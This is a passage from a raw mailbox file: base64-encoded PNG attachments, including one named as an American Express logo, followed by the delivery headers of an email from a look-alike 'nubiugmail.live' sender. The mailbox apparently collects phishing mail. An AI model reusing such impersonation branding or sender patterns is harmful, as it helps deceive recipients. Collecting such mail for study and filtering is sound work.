7+ojXiZarBqi7brT12lmP9pWF2IIveglk/HVL3NrW0I8ihWd4etiVEji+pH3CEfq5lvAGin3
oz/6YHIlzPgW1Vp71owS15Fu+V/o0sTti2o7nRm1hHhuZQY9Mb4/8wTSOe22WLi9qDhw2iqB
lUK+L7NpFOT3ktHwkqMJF3zu8wRCGHL7yvTcLAYdqio91tAh8oVHV//VEuKlrM0HhKp+8Z8S
2sUh+okDp+3fWGleveap7GANl9Y16i7cRVysziU/lPFgufRfdH34SVadMenUFrkgDO977oHz
TSNeVxOEIK6pqxq06/P+85c31jY4kptLv9rNsSyJoxJ+fBUN8j28SqxWruvKVjvk6SbHEIOB
6gPdD8+y2swbi776y/vdVCOYUOUWZaBv7iE+7zdIhINNd/BzmRZieVz9Ee9ZBPM2OIvBbifv
jok/5q5f23N05oFFW3wzL0KKfjfk+44p8XsjPKMZci4WKsWcWHSMzzuybRRlfpTmQ5nvNVPO
ZiDduUZCIj4SEvGRkIiPhER8JCTiIyERHwmJ+EhIxEdCIj4SEvGRkIiPhER8JCTiIyERHwmJ
+EhIxEdCIj4SEvGRkIiPhER8JCTiIyERHwmJ+EigoGmUIqe7UvtYMGb2XxGFe802eRxBAAAA
AElFTkSuQmCC

------=_NextPart_000_0012_89EFF6E9.5672A4DB
Content-Type: image/png; name="americanexpresswhitelogo.png"
Content-Transfer-Encoding: base64
Content-ID: <americanexpresswhitelogo.png>

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
SUVORK5CYII=

------=_NextPart_000_0012_89EFF6E9.5672A4DB
Content-Type: image/png; name="donotlivelifewithout.png"
Content-Transfer-Encoding: base64
Content-ID: <donotlivelifewithout.png>

iVBORw0KGgoAAAANSUhEUgAAAQ4AAAAgCAYAAADjYJZXAAAACXBIWXMAAAsSAAALEgHS3X78
AAAKsklEQVR4Ae1dPYwjSRV+jTYCdDOAEC2BGC+IBDjWp8u4O8aDECIA7YCQEDTSeCVEwknr
TdAlcDMJumy90h0h6xFyBMFscunaMUjnEUQkawdIFsm5YwKjGr7yfn5+1T+en7W3+5NG0y53
V9errvfVe69etaP5fC41amhEcdISEfc3FpHRfNof1Z1Uw6MmjhoriOJkV0QGInKHvvvxfNo/
q3urhsOtDWjDC0UUJx0RaaMNx9usHFcoS0eRhkNTRGriqHGBT9TdcKEQd/DX3ID2XAaty8oC
a+PdjZGoxkaiJg6Rw6wvnSJBmbYBrRxZGgVk4f6YiMj5lshe4wZRaeKAEu1kfO8Cgh87f3/T
ySOKk6aSZaa+d0HOZwVkadPxGYKjNWosoeoWh56hB+qzV7BtcGMa6rNeBcmVxVkkIrJPRT2q
Z9vduBpXiKoTR54y+Nn23FDEwrgha0WT4Ex99u0fZsjCbkqKJdiuiBwgYFqjxgWqvqryA/4w
n/a1xeGUpnuZlZYoTt4XkR8aFoH/vg0CGyBfYl3X4Pv8wci76BWQhclngHpm2hIDEfaozbrf
arzkqHQeRxQnM4oLTObTvqncgWu/JSJvisiHIWWP4mRPRP4mIp93s7ZWsChOjo0VjJXz1pDl
fD7tl3ItQAYfU9GD+bTfNc5rgjR4uXY4n/YzA7M1Xi7cgl9rKcysSLYgZRgKzOOBdR3O8xiz
sqk2XNxXt8spk6ojC+O8mRv1czCx7Ez/RxF5A3Xdm0/7PeOc34E0hGIM/v4dIo0U7sM+XIJS
xBHFyVtKlnXcqrx4D1sanjSGaPN+FCeHZS2z0JgAOe3mlWO8MUGWjceMUN/SOFPyLtUPC4xl
aKDvGlTnwDiP276kWwXkCiI0yVh9W0J/FnJCPnfcIL2c3UIU3Vy3j+IkJXNdd0QLg2jPuM4N
qLZS3qd0nLoGUJ3chiEehG5XpOrIwolLgMo552fqc9lZ/q+eONBeizi+R8eLBCoMlIcoT3H9
yuxeAj9Sp16WONLApMGkcYrP/pms42KdEeGd0orOgMofUXzlI7r2AP+f5pRl4QBy63Hm0TTq
vxgnIBU3xu4b9bvxfawsti4Fnoeqv/m7E9yjqAxRoJyv9/pQpl8GIIkBnnMripMunsVxXnB0
B526tIQH0nhqkQbgOsGzU6jeyyjKVeCrqg6eAVwnOZnHcCcssOwrciJ2wefwbPxnOm5jEPmB
cxX9YskyyJBFrPgGI4qTRETuougcA8iT5XDNvSzcJ02xLcGWPCfbBTYgrnIWIA1B+x9C0bYZ
MzxnH4NbBMit4OgQ/zkv4A4GtJ8R9Ox6ihmHFcCTQyjB6iiKk17BAZCqtgmUlRWTvysy+31d
feZ2tEmO0IoIxwMss5IHzUKxoLzfpDaPlAKGTE83UDsBF+zb/EHVwbKE6t5VMYsz4/sPqKiD
Gcz3v0lI3o2dT/shwnLtOcKxv7/uS6t8KGHM1Pc8jlNljemVp0LApMDL1hM8w130t7/ffYzx
sqRaRoYyWKdfmiSbz+uZrRCHD3IZG52O4Je3lMKe8MDAAPcz011Xj3ZzCD09k1A7jjHw9v3A
5ACcDiyuEZz7tLoft5HJLuS3v0rHSw8SbeNZsyvP+7Sjyr25nqrkK66vCwUMEeKX6DhV37Es
IZLWfdfCzD9G7KZD8gxB2n62PbXIjuIhWbOuDha3rOxXlDdD1zGgpDxOBqTkIz1OXGwmo30h
8DN0/d2kmEBPuVSd0HO9KhlK1FuqTshkkn7QVQlc1DRmBD0wtDWSFeTZy5itfDLS0IruXwGW
VgXovpkZmIQ40G6nMG9T0YSChqyA55Ddt8O0JjC73c/ZYMZEroNuRWT5jfp8BFLuGGTn2viY
ZFjJ76BJZy9HyceYrT00QYTKr81NIbdukEF6PHZ6POlA6TlNv/BK3TYhL48jz5RLDWtCP1Sr
41I25yzTE4MqFPi5FLBMymCL4Rt0fB5YIXobS7EW3GrL56j8WJ4TISsZDz5zVQaK7wdviGC1
LNz/7MKsyII2/VwFcQXPwylET1lPKVkw57CCrDHShXynBcx0jhU0VQBx3yi/7vjGfoFzGJYV
OMhwvV4KXDZz1NrnoYnCGlgdZVKXfViXxSsZbfwlHVuk8YahxD5+4Wba71D5hAjhMNBfIdLY
JTfmUUE3RcvyEzq2lO27IvIHVfbEma3UJia7HfwFSQPurI9b5K1s6XaxuXxGMzeXPylQ503C
ioGxDqwVR9l05BGHZktroGiiyL0GLF1kUF0XsiyOVwLlHo+VRcEy/kJEvkjlLKP2pdMc0vCm
fprTV5/JkCUvt+Mdo2zhEiG2oMlumEEabVpmPimYBcvEsaPKR4Hya8N82o/8Hy35ZsGyqFkH
rD7QZLMtu68XCBIHBg0P2AnMTu1rd+maXXVNGjIrEbfIio5fJ76m6mYl4NiFNu37dO1/jPb9
lo4nihTYqjpBQk0WaXhTt50RXBZDFsZn6XhpAEdx8pfAtSELYIKs1izS4NhHobgU6tJb930e
iTV2NiG9na2eIw7ww+KyluF5LN3x1+C/fmnSxmMlxhHFSSgH3a9sjJDg5RXhLrZsj9USjxQY
PG10aHBr+zVB348f6hes8ihO3oNFISC8Ga0ezYy8DV5p4hkoDS1PGqRxUiAbc0kWT9RIiY91
OcnyU6uyDCuhm7FUzKSRFiA7Df2aQn8fbSWFEtNuGl169g4fQSf0snZKiwUDlfcxwGsbtIW+
FW9ZKxrjeKRmx0M1S+yBSHgQn2as318Ag/RFuCxLpiEtpbmH+Cmj3MU1fo1i7zrMVX3a0uqp
7z3MgW+QxpO8/gO+HCh31sYnjfs4WX5FsvCqRpYFGGo3k4aANMoqt1YWv8FupGJhG7GZDgR6
TxXvG6SxsM4wAXD/7gR0ZiteCp1FHEOk+96eT/tLS27ojBZM7om6bgLfvdDaNVyWmw54ldnM
9ioyPX0s4RgDh60LbZ5qSytzMICwRjTwzkus/X8lUG65E06WPsVoNDGVShvHiguTxr11dhIb
lswocLwxu3AxMRwEyPYUuR36uR9m6MxJUZ3ZBFzJ7ljaDLSyCWgjhf5/rMK7HYJAmP9uTCTg
yOIftHJx6h9uFCf/CsQI/u0yQ429PT4xbmknKWbsrsrvCC1zWrL8XURe99fyrli1Y9aURbmm
OpmvSclMB+QG+eQuNtcf6QmmSvDuaFV+RuJK3sdhvbNhw/HfjOZxXsGYFG+kZoQPA3sV/pSR
23AXO0kb5N6w8q0TH/gnEYeOzveyZDGydpcGPeJZT9DGNnzyQ5VuLnCrKv2in6r97kxV3wBm
5Wc0sWO3Q/7rIs16Pu2/xufjvAfKB3cz9u+tG2K2foCPzzCTM2l4S6PsAOTz9yBLG6n+ebJo
orFclTbadoT9OY8VaThLY5207RpbjKoSh/VCnYGPfcB/vQ0f9rXQ3gDEZxqIA0UFgsFdg2xS
+L3rkIYlSxfKXUoWCcyaFM/SvvwQ7kv9SsEKorJvAMN6+0NVvNbbt9a8f6vIC4cK1mXJcrvA
y4xa/I4GjvUEzm8g/6R+VWDFUfVXBzbgszfg91sv49kKkCy7kCV3daMscdSosRg79W/HVhcg
m2e+A2riqFEUVf95hEpDb2vfol+sq/GCURNHjSYSlobbuNmqxguAiPwPjIrTvi3btlAAAAAA
SUVORK5CYII=

------=_NextPart_000_0012_89EFF6E9.5672A4DB--

From jose@monkey.org Mon Dec 16 21:22:59 2019 +0000
Return-Path: sales@nubiugmail.live
Delivered-To: jose@monkey.org
X-FDA: 76272279678.13.spy84_37104ef277110
X-Spam-Summary: 50,0,0,710b783370927ec2,d41d8cd98f00b204,sales@nubiugmail.live,:,RULES_HIT:41:72:355:375:379:495:800:962:967:973:983:988:989:1021:1189:1208:1224:1256:1260:1263:1311:1313:1314:1345:1381:1431:1433:1434:1436:1437:1513:1515:1516:1517:1521:1533:1534:1541:1571:1588:1589:1593:1594:1685:1711:1714:1730:1747:1777:1792:2393:2525:2527:2557:2560:2563:2610:2682:2685:2828:2859:2898:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3586:3865:3867:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4903:5007:6117:6119:6261:6653:6669:6678:7809:7974:8518:8583:8599:8603:9025:9388:9416:9466:9468:9873:9908:10004:10346:11473:11657:11658:11914:12043:12050:12295:12297:12555:12660:12740:12895:12955:12958:12959:12986:13139:13311:13357:13439:14093:14096:14181:14384:14721:14764:14799:18000:21080:21325:21451:21524:21554:21627:21796:21863:30037:30054:30070:30080:30091,0,RBL:117.50.59.220:@nubiugmail.live:.lbl8.mailshell.net-62.2.2.100 64.100.201.201,CacheIP:none,Bayesian:0.5,0.5,0
X-HE-Tag: spy84_37104ef277110
X-Filterd-Recvd-Size: 2922
Received: from nubiugmail.live (nubiugmail.live [117.50.59.220])
	by imf17.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon, 16 Dec 2019 21:22:58 +0000 (UTC)
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; s=default; d=nubiugmail.live;
 h=From:To:Subject:Date:Message-ID:MIME-Version:Content-Type:Content-Transfer-Encoding; i=sales@nubiugmail.live;
 bh=OW1wS+AhXnGTJQEvY/LESDhXlOk=;
 b=FqwVwyvMO/FBmhNmVTDQzyqy+yHlyY/dLqn3//2ggXp3mzuYDRoBwcnOZlC5c8IriijYevSI4b4S
   fwuWMaW7Gq6NgMfurAW7+osON7w+WL0817KKtgXOdC08EJrxLVqYGpwzDADAe1FZm4I+yPPU4CML
   xvKmDCTEjM7OWtXdBmg=
DomainKey-Signature: a=rsa-sha1; c=nofws; q=dns; s=default; d=nubiugmail.live;
 b=NKzid8KnX5gDtI9oSrFMe0b4jw8LDjlRXtpn+SrqDmqOU38/76YuZpomCZYoQ/21F4AGAKhuYTEP
   nyIQjFmbBKnbRp67b7jBnjClmo2Ya6UYRm1MgzFZOjMpolAESa3WsF62mESMdmfwJjcrsON67Z8h
   DOAgvHo98ztmhs0HGJ8=;
